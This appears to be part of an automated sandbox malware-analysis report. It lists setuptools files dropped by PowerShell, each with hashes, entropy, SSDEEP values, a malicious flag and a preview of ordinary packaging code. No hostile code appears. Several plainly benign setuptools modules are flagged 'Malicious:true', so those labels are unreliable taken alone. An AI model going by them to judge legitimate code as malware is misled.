                                                                                                                                                                                                                              SSDEEP:192:ygFGHA+g6mti6VW2N4MKqZ2BWwxFe1uiZ+kSLitni5kv7qfe9GJQq498ch1:yv3g6j6VRtKqYBJ6X+kBVvufgq498cv
                                                                                                                                                                                                                              MD5:D8BCB5536AB99BA767510642E5A20DA2
                                                                                                                                                                                                                              SHA1:2F931AA3ABB32F3A9789463949FFBB234B50C035
                                                                                                                                                                                                                              SHA-256:57033C227F47D4A6C844478829FC5EA53B91E16C57CD095CCC021D65A640B03A
                                                                                                                                                                                                                              SHA-512:6B2E43FE0BE11D451EBC44C5E06D0C402BE15477A63DAC0754F51C97BBE7B80C8498A4134C09095C6C5D58115F5A34AB6975495575D6E6D1CFCAB0F4F3B00808
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d.d...Z...G.d...d.e.j...........................Z.y.)......)...logN)...chain.....)...metadata.....)..._ORIGINAL_SUBCOMMANDSc................#.......K.....t.........j...................d...........D.] ..}...|.j...........................|.........E.d.{.............."..y.7.....w.).z%Find all files under revision controlz.setuptools.file_finders)...groupN).r......entry_points..load)...dirname..eps.... .IC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/sdist.py..walk_revctrlr........s:.............#..#.*C..D....&......2.7.7.9.W..%..%..%....&..%.s.....3?...=...?.c.............................e.Z.d.Z.d.Z.g.d...Z.i.Z.g.d...Z...e.d...e.D.................Z.d...Z.d...Z.d...Z.e.e.j...................d...................Z...f.d...Z...f.d...Z.d...Z.d...Z.d...Z.d...Z...f.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)...sdistz=Smart sdist that finds anything sup
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7016
                                                                                                                                                                                                                              Entropy (8bit):5.235064529768924
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/2w6lU6Hiy9C93XkSCX9HyMqY9N0kUq2seH5ZJ:n6QaJqYMkOZ/
                                                                                                                                                                                                                              MD5:1F45B919D7AD78BC696E88E15CCC4A53
                                                                                                                                                                                                                              SHA1:37D1D2DDDFBFC998208F4C28C31AB1EB3920FB1F
                                                                                                                                                                                                                              SHA-256:84F2900C39FA7834245FDC394AABCDF9C58160C35DF82C822EC1AABCA42A8C9D
                                                                                                                                                                                                                              SHA-512:D518AC53F5C92DEFFE7DC750549FF13D907E73A9C9DE3675B1DDDAD3EC5C64AB17A7EF0DDB14712E950277AF7C926A49CF6D93455324CF0D23E209C6C498C027
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d...Z.d.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...convert_path)...log)...DistutilsOptionErrorN.....)...Command)..._cfg_read_utf8_with_fallback)...config_file..edit_config..option_base..setoptc.....................\.....|.d.k(..r.y.|.d.k(..rKt.........j...................j...................t.........j...................j...................t.........j...........................d.........S.|.d.k(..rFt.........j...................d.k(..x.r...d.x.s...d.}.t.........j...................j...................t.........d.|.z...................S.t.........d.|...........).z.Get the filename of the distutils, local, global, or per-user config.. `kind` must be one of "local", "global", or "user". ..localz.setup.cfg..globalz.distutils.cfg..user..posix.....z.~/%spydistutils.cfgz7config_file() type must be 'local', 'global', or 'user')...os
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13184
                                                                                                                                                                                                                              Entropy (8bit):5.088826460634631
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9Y87p5xd1iHZYdwyqWSmsikRK+grDUGXdJoQB3lJVHLMX:9pxe5zyqWSmf6K+gXUGXzoC3lJFMX
                                                                                                                                                                                                                              MD5:031BFA94555FFD57AEFAB7D6B0EB5AB6
                                                                                                                                                                                                                              SHA1:1D083BACD2F03361C9B48385238BC726A07EA886
                                                                                                                                                                                                                              SHA-256:A8E717C1FFC8E0EDD533227CF9912C4F9D9E0A3B6F24D983142F4CDFB8371474
                                                                                                                                                                                                                              SHA-512:72645C27F3D0FF06D65E48FDBC93A9AF1D63AA977E0AC5C4E6B1D3099200D5675121C6E288CD778F96C0C6BD02040427447D097FD880EA3978F4E520BDBCA888
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.)......N)...DistutilsError..DistutilsOptionError)...log)...TestLoader)...resource_listdir..resource_exists..normalize_path..working_set..evaluate_marker..add_activation_listener..require.....)...metadata)...Command)...unique_everseen)...pass_nonec...........................e.Z.d.Z.d...Z.d.d...Z.y.)...ScanningLoaderc.....................L.....t.........j...................|...........t.................|._.........y...N).r......__init__..set.._visited....selfs.... .HC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/test.pyr....z.ScanningLoader.__init__....s................D..!..............Nc..........................|.|.j...................v.r.y.|.j...................j...................|......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):952
                                                                                                                                                                                                                              Entropy (8bit):5.104297546804117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:hNroVXqHcWTQCU+z/uej8JDlaYmLn8KNxVl2hDubTfCRxHvhIW2yM9vSleC+7/:voVX2fDqlaYs8KNxf2hub2Rx5IW2yMb/
                                                                                                                                                                                                                              MD5:7D6F952345A8DE07C44B81CB0AC2FF79
                                                                                                                                                                                                                              SHA1:53EF3B1595EB334A266517B06F55BD0E3CCE4C48
                                                                                                                                                                                                                              SHA-256:B2BBCF93AB1EFFF5EDCB6738256C6B1E697C5EB00CAB65C65B54B46CEC2A6E38
                                                                                                                                                                                                                              SHA-512:FDB537B9309CFCD771BEEA17CB554B63B4D1A9747AAD6EE416266D7062FF622B8F9249CF97B32461D1264F612A57EF4589D2D791428D2D051330EAC6757F7EE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................R.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z.y.)......)...log)...upload)...RemovedCommandErrorc...........................e.Z.d.Z.d.Z.d...Z.y.).r....z)Formerly used to upload packages to PyPI.c.....................b.....d.}.|.j...................d.|.z...t.........j.............................t.........|...........).Nz[The upload command has been removed, use twine to upload instead (https://pypi.org/p/twine)z.ERROR: )...announcer......ERRORr....)...self..msgs.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/upload.py..runz.upload.run....s/.........3...............i.#.o.s.y.y..1..!.#..&..&.....N)...__name__..__module__..__qualname__..__doc__r......r....r....r....r........s........3....'r....r....N)...distutilsr......distutils.commandr......orig..setuptools.errorsr....r....r....r......<module>r........s..............,..1....'.T.[.[....'r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11179
                                                                                                                                                                                                                              Entropy (8bit):5.290564063149569
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ICK25ZJOGI9lCE4iYGOWtnVmgQmfuCD7mBevlBWrs0cBzKdeY3xgebYN2yclurwR:G274rlCfWtnVjQSuTBLrsL5Ki0YNKXPJ
                                                                                                                                                                                                                              MD5:530A74FDCA67347D9B791ABF6AD74D7C
                                                                                                                                                                                                                              SHA1:24E9435EAD079E74F57641E1B8A0E33E8275AF7F
                                                                                                                                                                                                                              SHA-256:64FF36715C822FB1DDEA414C9ED4AE9012360BB3ED282AD2AF2D686F5BE1EF01
                                                                                                                                                                                                                              SHA-512:35829C6CCED146605D72C9DEC79BE7C73D716CB126DB176600A981FF43E10AFE30D3417549C6553922A9361581EB146C624B2E5D1C516EAE35066DB0787713B0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.........Z.y.).z|upload_docs..Implements a Distutils 'upload_docs' subcommand (upload documentation to.sites other than PyPi such as devpi).......)...standard_b64encode)...log)...DistutilsOptionErrorN.....)...metadata)...SetuptoolsDeprecationWarning.....)...uploadc.....................&.....|.j...................d.d.........S.).Nz.utf-8..surrogateescape)...encode)...ss.... .OC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/upload_docs.py.._encoder........s..........8.8.G...../../.....c..........................e.Z.d.Z.d.Z.d.Z.d.d.d.e.j...................z...f.d.d.g.Z.e.j...................Z.d...Z.d.e.f.g.Z.d...Z.d...Z.d...Z.d...Z.e.d...........Z.e.d...........Z.d...Z.y.)...upload_docsz.https://pypi.python.org/pypi/z;Upload documentation to sites other than PyPi such as de
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4222
                                                                                                                                                                                                                              Entropy (8bit):4.674627707230452
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:k05D7JtSERvENAtHlkxTqF0I5KNcnflT8gc/4Xf4ZOi:kyrvR8mdlOTi0I6cnfigcgv4
                                                                                                                                                                                                                              MD5:279A4BEDD9A019422D0C76901B271694
                                                                                                                                                                                                                              SHA1:3A11FDB5CFB572C2E3EF515B0E6B2C7BDF7142B2
                                                                                                                                                                                                                              SHA-256:5D91B66F70836CBFF21A9365ED42FB7F991731BF4EA7342A7F19069E8964C92B
                                                                                                                                                                                                                              SHA-512:855F936250706937C9B2EC2E3E2E0503A3E7516860766F847C166CAD56C279E524A55C8BA61D0DA154793EA8DB687D283B6E03438CDA938D6284D732914D4E31
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Helper code used to generate ``requires.txt`` files in the egg-info directory...The ``requires.txt`` file has an specific format:. - Environment markers need to be part of the section headers and. should not be part of the requirement spec itself...See https://setuptools.pypa.io/en/latest/deprecated/python_eggs.html#requires-txt."""..import io.from collections import defaultdict.from itertools import filterfalse.from typing import Dict, List, Tuple, Mapping, TypeVar..from .. import _reqs.from ..extern.jaraco.text import yield_lines.from ..extern.packaging.requirements import Requirement...# dict can work as an ordered set._T = TypeVar("_T")._Ordered = Dict[_T, None]._ordered = dict._StrOrIter = _reqs._StrOrIter...def _prepare(. install_requires: _StrOrIter, extras_require: Mapping[str, _StrOrIter].) -> Tuple[List[str], Dict[str, List[str]]]:. """Given values for ``install_requires`` and ``extras_require``. create modified versions in a way that can be written in ``r
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2383
                                                                                                                                                                                                                              Entropy (8bit):4.318394624479931
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Gl71hQuyinUv4hb2nnDMhLDqVUievrmwy90rmuAf9/rwPxXK73TTql:0731yin+48ohn7QTTql
                                                                                                                                                                                                                              MD5:FD1589FE1C967B82C20ABD2245ED5F78
                                                                                                                                                                                                                              SHA1:7FF04C5E8AE3EC3E63B8EB6C7C5521732CCFB5F6
                                                                                                                                                                                                                              SHA-256:D61A25AD2B1D631A7512CA1ADB27D11CB8E26250918B78D8672DB25A6EB66155
                                                                                                                                                                                                                              SHA-512:DE847FE1D649B7D3DE8F6DF46CBD24480B528D2381530C53E6931AAFA77EFE617611363FCB3482C43D8CA33E4C999C4606B0490F566D1539AD732F949B81501F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils.errors import DistutilsOptionError..from setuptools.command.setopt import edit_config, option_base, config_file...def shquote(arg):. """Quote an argument for later parsing by shlex.split()""". for c in '"', "'", "\\", "#":. if c in arg:. return repr(arg). if arg.split() != [arg]:. return repr(arg). return arg...class alias(option_base):. """Define a shortcut that invokes one or more commands""".. description = "define a shortcut to invoke one or more commands". command_consumes_arguments = True.. user_options = [. ('remove', 'r', 'remove (unset) the alias'),. ] + option_base.user_options.. boolean_options = option_base.boolean_options + ['remove'].. def initialize_options(self):. option_base.initialize_options(self). self.args = None. self.remove = None.. def finalize_options(self):. option_base.finalize_options(self). if self.remove and len(self.args) != 1:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16457
                                                                                                                                                                                                                              Entropy (8bit):4.472949345073106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:EroWTSmmg6OdJma/pdDK5yhVMTmOlU2M6K:EroW16OdFK5yhVMTmOZM6K
                                                                                                                                                                                                                              MD5:C78C62FAA732C75036BB17313DBC1936
                                                                                                                                                                                                                              SHA1:09D81FE443705B92205838920D13104BD5C8B705
                                                                                                                                                                                                                              SHA-256:EB2D917E7DE5511946C9A085DE8C779CF7E82A003F657FE6D1B4444388CAB2B0
                                                                                                                                                                                                                              SHA-512:2D1978829D46AEFA4CEA82FEF1224AB0F6E0ACD71DF8A14B4DDC0FF6EF3112916FEBF587471F569EB30A60A27F83E03F7F1C6EE501A1B103270EA36AC2812789
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""setuptools.command.bdist_egg..Build .egg distributions"""..from distutils.dir_util import remove_tree, mkpath.from distutils import log.from types import CodeType.import sys.import os.import re.import textwrap.import marshal..from setuptools.extension import Library.from setuptools import Command.from .._path import ensure_directory..from sysconfig import get_path, get_python_version...def _get_purelib():. return get_path("purelib")...def strip_module(filename):. if '.' in filename:. filename = os.path.splitext(filename)[0]. if filename.endswith('module'):. filename = filename[:-6]. return filename...def sorted_walk(dir):. """Do os.walk in a reproducible way,. independent of indeterministic filesystem readdir order. """. for base, dirs, files in os.walk(dir):. dirs.sort(). files.sort(). yield base, dirs, files...def write_stub(resource, pyfile):. _stub_template = textwrap.dedent(. """. def __bootstrap__():.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1289
                                                                                                                                                                                                                              Entropy (8bit):4.469713981143695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:gMEOHaBo/CqbpJg4JIOG7AJ6e4Q7gi5mx9Nz/MVslhm/:H2BGCqzg4GOG7Ajc+mdGs0
                                                                                                                                                                                                                              MD5:AAECC7BF35B6917255ED29871B78088A
                                                                                                                                                                                                                              SHA1:6D39EF13BD54607BFB5807E96E5280D05F681BA7
                                                                                                                                                                                                                              SHA-256:8A541CD5754D071BF53BEF14443DE2493AACCE7750D92581A59566AD1D9AC0ED
                                                                                                                                                                                                                              SHA-512:75B10479F6F566D55C4D4B914239CC89859344BE4CCCEA9B730070CA9DAA4D7737D7000895D083BA57A8B10DEA351D27C12CB9DF090F60CED37BCB13E50AB4E6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import distutils.command.bdist_rpm as orig..from ..warnings import SetuptoolsDeprecationWarning...class bdist_rpm(orig.bdist_rpm):. """. Override the default bdist_rpm behavior to do the following:.. 1. Run egg_info to ensure the name and version are properly calculated.. 2. Always run 'install' using --single-version-externally-managed to. disable eggs in RPM distributions.. """.. def run(self):. SetuptoolsDeprecationWarning.emit(. "Deprecated command",. """. bdist_rpm is deprecated and will be removed in a future version.. Use bdist_wheel (wheel packages) instead.. """,. see_url="https://github.com/pypa/setuptools/issues/1988",. due_date=(2023, 10, 30), # Deprecation introduced in 22 Oct 2021.. ).. # ensure distro name is up-to-date. self.run_command('egg_info').. orig.bdist_rpm.run(self).. def _make_spec_file(self):. spec = orig.bdist_rpm
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5792
                                                                                                                                                                                                                              Entropy (8bit):4.6057574541040065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Q+yQKU3gj8PseTR73M6auDEnbjL+cR6Od6388x/pEwTAlC8foC91ptn:JyTU3HDR7HDEnbf+cR6Od6xS2AX3
                                                                                                                                                                                                                              MD5:DEC13D316C3F6900C86D1A061D038A56
                                                                                                                                                                                                                              SHA1:1B66B56EE4CDB85C1B6455171BD57E594AD9CF95
                                                                                                                                                                                                                              SHA-256:09C9CE08BCF2D2BC6873D5B5E3001C03800541D6D1949E4DC7C1D2822A13171C
                                                                                                                                                                                                                              SHA-512:A848FDDE0F49A9F391EEB613C2ECA4DEDDC3D6BFC8A8B75C79526417096638B5E2B552847E8D9ED2AA290557E8BDEFAB4C9498642E93F8A07460731DC5CE556C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Dict, List, Protocol.from distutils.command.build import build as _build.._ORIGINAL_SUBCOMMANDS = {"build_py", "build_clib", "build_ext", "build_scripts"}...class build(_build):. # copy to avoid sharing the object with parent class. sub_commands = _build.sub_commands[:]...class SubCommand(Protocol):. """In order to support editable installations (see :pep:`660`) all. build subcommands **SHOULD** implement this protocol. They also **MUST** inherit. from ``setuptools.Command``... When creating an :pep:`editable wheel <660>`, ``setuptools`` will try to evaluate. custom ``build`` subcommands using the following procedure:.. 1. ``setuptools`` will set the ``editable_mode`` attribute to ``True``. 2. ``setuptools`` will execute the ``run()`` command... .. important::. Subcommands **SHOULD** take advantage of ``editable_mode=True`` to adequate. its behaviour or perform optimisations... For example, if a subcommand d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4539
                                                                                                                                                                                                                              Entropy (8bit):4.067972974028069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:X1rRRV5ui4sJm+w9RmfIJmF4lZ2yrAqjM4ddHTRs:lr7E9qXsA7eFRs
                                                                                                                                                                                                                              MD5:463839F0AC483EC9969892A9E8F16037
                                                                                                                                                                                                                              SHA1:53A655AD73EE84D885016317FCEA9E7CD9176583
                                                                                                                                                                                                                              SHA-256:D006F42A9A738B0E2783FE753837D0C45F07C54E9E6BCF44132042F24587B677
                                                                                                                                                                                                                              SHA-512:6AC712833C2F8AF11A9BF5A0F802B14612A7F2A2A7E8834A3C7BC32E891ADE650BF41DE027B3E2A0339A60AB9CA404461DEBA910B686EEC1085FB5C0F34C1699
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import distutils.command.build_clib as orig.from distutils.errors import DistutilsSetupError.from distutils import log..try:. from distutils._modified import newer_pairwise_group.except ImportError:. # fallback for SETUPTOOLS_USE_DISTUTILS=stdlib. from .._distutils._modified import newer_pairwise_group...class build_clib(orig.build_clib):. """. Override the default build_clib behaviour to do the following:.. 1. Implement a rudimentary timestamp-based dependency system. so 'compile()' doesn't run every time.. 2. Add more keys to the 'build_info' dictionary:. * obj_deps - specify dependencies for each object compiled.. this should be a dictionary mapping a key. with the source filename to a list of. dependencies. Use an empty string for global. dependencies.. * cflags - specify a list of additional flags to pass to. the compiler.. """.. def
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17735
                                                                                                                                                                                                                              Entropy (8bit):4.441783104967182
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Z7cJIsJEHe7K0kTXB9EyhB9llGcQ/QSOGBNp2DlQZpFnolQLN53F9/gJ0U55DNa:Z7zSEHY/09vhvllYQmEle3oCvPIqUzE
                                                                                                                                                                                                                              MD5:580B09E85E70EEAC1E33F5BD6694BB80
                                                                                                                                                                                                                              SHA1:8951FEEA6D0A1EDC68F4E4A73DC5578B61841775
                                                                                                                                                                                                                              SHA-256:F4969A9DDFBBD339CE75314FBE88183E9F6CE468E9D9A5EECC2AB4ED6D5B4C4E
                                                                                                                                                                                                                              SHA-512:EFCD0BA53B4B3B6AFD6966A557FCDE4CBD21967E582E841FB186170054844BF0B781948F24642751CAE49EACD951F4EE0548AD48B4D938B13FF5C88960A80237
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import os.import sys.import itertools.from importlib.machinery import EXTENSION_SUFFIXES.from importlib.util import cache_from_source as _compiled_file_name.from typing import Dict, Iterator, List, Tuple.from pathlib import Path..from distutils.command.build_ext import build_ext as _du_build_ext.from distutils.ccompiler import new_compiler.from distutils.sysconfig import customize_compiler, get_config_var.from distutils import log..from setuptools.errors import BaseError.from setuptools.extension import Extension, Library..try:. # Attempt to use Cython for building extensions, if available. from Cython.Distutils.build_ext import build_ext as _build_ext # type: ignore[import-not-found] # Cython not installed on CI tests.. # Additionally, assert that the compiler module will load. # also. Ref #1229.. __import__('Cython.Compiler.Main').except ImportError:. _build_ext = _du_build_ext..# make sure _config_vars is initialized.get_config_var("LDSHARED").# Not publicly expos
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15127
                                                                                                                                                                                                                              Entropy (8bit):4.495201861601051
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:a2AL2tMBHDydOWEfgnZTaYb/z4wdF9B/DMnXd:afLDydONoaYb/z4wF9B/DAt
                                                                                                                                                                                                                              MD5:86FA8C73E9A6AAE45116B56E9ED6FF87
                                                                                                                                                                                                                              SHA1:68F7DE4790A6F9A6D60D4C490999B16A78012FBC
                                                                                                                                                                                                                              SHA-256:C7E58AF11228A2A740E0723D570A656F433BF94374537415617234C0082F03FE
                                                                                                                                                                                                                              SHA-512:08A6DC8D83177E1480CE9E46BF75961A322E6DDCCDD9D46A2C71AEF535F404FA89AFAE840AD182DF1646D2FBDE5BD6A2A4C3C2B2BC21EE2998A16E8C076B88E5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from functools import partial.from glob import glob.from distutils.util import convert_path.import distutils.command.build_py as orig.import os.import fnmatch.import textwrap.import distutils.errors.import itertools.import stat.from pathlib import Path.from typing import Dict, Iterable, Iterator, List, Optional, Tuple..from ..extern.more_itertools import unique_everseen.from ..warnings import SetuptoolsDeprecationWarning..._IMPLICIT_DATA_FILES = ('*.pyi', 'py.typed')...def make_writable(target):. os.chmod(target, os.stat(target).st_mode | stat.S_IWRITE)...class build_py(orig.build_py):. """Enhanced 'build_py' command that includes data files with packages.. The data files are specified via a 'package_data' argument to 'setup()'.. See 'setuptools.dist.Distribution' for more details... Also, this version of the 'build_py' command allows you to specify both. 'py_modules' and 'packages' in the same setup operation.. """.. editable_mode: bool = False. existing_egg
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6889
                                                                                                                                                                                                                              Entropy (8bit):4.424678533410589
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WoarlMLFJ0GKAeMXxB2LqmoG8oV1ZsKkyXTxmJmUS6ZgoqmjpH+P:v5lKhMxB2myjrkYTxjiZgoby
                                                                                                                                                                                                                              MD5:7F72675826015589BCFAEA7E053F5FE8
                                                                                                                                                                                                                              SHA1:CCF1D4076BA8E3EC9244B9A4FC636C0E65832993
                                                                                                                                                                                                                              SHA-256:A39C99551DFDFA221D0903F9FD189BF18C78DF66B31751F55762A5DEE09BB729
                                                                                                                                                                                                                              SHA-512:34CF44464FC2355C8CA89DEB4B55C494A9BEA9981774B58969B2C3218261981F4679CBDC07795B9204CC828251B1E6DED4022896EF6E2DC5AD8DB53260F58156
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils.util import convert_path.from distutils import log.from distutils.errors import DistutilsOptionError.import os.import glob..from setuptools.command.easy_install import easy_install.from setuptools import _normalization.from setuptools import _path.from setuptools import namespaces.import setuptools..from ..unicode_utils import _read_utf8_with_fallback...class develop(namespaces.DevelopInstaller, easy_install):. """Set up package for development""".. description = "install package in 'development mode'".. user_options = easy_install.user_options + [. ("uninstall", "u", "Uninstall this source package"),. ("egg-path=", None, "Set the path to be used in the .egg-link file"),. ].. boolean_options = easy_install.boolean_options + ['uninstall'].. command_consumes_arguments = False # override base.. def run(self):. if self.uninstall:. self.multi_version = True. self.uninstall_link(). self.uninstall_names
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3507
                                                                                                                                                                                                                              Entropy (8bit):4.580489450108719
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:enfF0b8uDMuo0qk9YKxXHt+Hq+ohpSN0/BKEFz++fWorEX/l:enub8eMuMkyq8K+Mpfrz0oEl
                                                                                                                                                                                                                              MD5:C1AC8A0C1208673A4FE3684A028A4A4C
                                                                                                                                                                                                                              SHA1:3CFF3F7335CFFB48ED26B2E220CAAEFC5F9CBB8D
                                                                                                                                                                                                                              SHA-256:7F76E574A3B6CEFAD93EEF5E9862E77CA243752A8BCC875516A803C37FFE2562
                                                                                                                                                                                                                              SHA-512:CFA1449A027BEAEA9BDCC61F4940D69F65F63638D67AA135BF380C751E9F064F4712D891BB5C09B1ED90C6AF321461A035CC8EE982FB5622F5F25439AC5E0C82
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".Create a dist_info directory.As defined in the wheel specification."""..import os.import shutil.from contextlib import contextmanager.from distutils import log.from distutils.core import Command.from pathlib import Path.from typing import cast..from .. import _normalization.from .egg_info import egg_info as egg_info_cls...class dist_info(Command):. """. This command is private and reserved for internal use of setuptools,. users should rely on ``setuptools.build_meta`` APIs.. """.. description = "DO NOT CALL DIRECTLY, INTERNAL ONLY: create .dist-info directory".. user_options = [. (. 'output-dir=',. 'o',. "directory inside of which the .dist-info will be". "created (default: top of the source tree)",. ),. ('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),. ('tag-build=', 'b', "Specify explicit tag to add to version number"),. ('no-date', 'D', "Don't include date stamp
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):87110
                                                                                                                                                                                                                              Entropy (8bit):4.432611961737299
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:jSzh+qJmon2gKQZSVuf5hImzqUM5rDTRtF7AyBDaJwSeN4RfmCc1c2incWKHgS/a:jyfkY1RhhXOBXB2lo2Vn/KHgi58t
                                                                                                                                                                                                                              MD5:F73CAD951058624FDAD62878F332B1BE
                                                                                                                                                                                                                              SHA1:5DA888E38E6881998903F2994562699ECC96AC93
                                                                                                                                                                                                                              SHA-256:983A87551CA234F322609C849BD94985DD286A62A787824670C9BD8BB4700445
                                                                                                                                                                                                                              SHA-512:1829A55929DA9D5A93E9EA89AA0FFA20E9F7AE48BA18F2B722503C3DD3038A541107294958D85F4E40927AFB5AD523886EE797B8544D9C0937DD70A0EA9C9869
                                                                                                                                                                                                                              Malicious:true
